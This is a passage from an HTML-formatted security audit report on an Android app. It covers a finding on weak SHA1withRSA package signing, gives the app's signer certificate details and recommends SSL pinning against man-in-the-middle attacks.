<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">This vulnerability makes the application susceptible to man in the middle attacks.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
A better security practice is to include an SSL certificate inside the application build.
Then check and trust only that certificate at runtime. This is known as SSL pinning.</div>
</div>
<a name="f53--privilege-extension-app-is-signed-with-sha1withrsa-known-to-have-collision-issues"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.27</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-027 — (Privilege Extension) Mobile application package signed with weak algorithm `SHA1withRSA`</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-027</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Cryptography</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;"><span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">SHA1withRSA</span>, which is known to have collision issues, has been used to sign the application package. </div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">SHA1 was used by default in APK signing for a few years. A attacker might be able to create an APK with his/her malicious code,
and identical SHA1 digest of your genuine files. Devices that had previous version will consider the crafted APK to be signed by your certificate,
and issue no warning when installing it.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Note: If you use SHA256, the app will no longer work on Android devices < 4.3. This means that builds made with the new cert system will create APK files that may not install on some Android 4.0-4.2 devices.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Signer Certificate</span></div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">[
[
Version: V3
Subject: CN=Ciaran Gultnieks, OU=Unknown, O=Unknown, L=Wetherby, ST=Unknown, C=UK
Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5
Key:
Validity: [From: Fri Jul 23 22:40:24 IST 2010,
To: Tue Dec 08 22:40:24 IST 2037]
Issuer: CN=Ciaran Gultnieks, OU=Unknown, O=Unknown, L=Wetherby, ST=Unknown, C=UK
SerialNumber: [ 4c49cd00]
]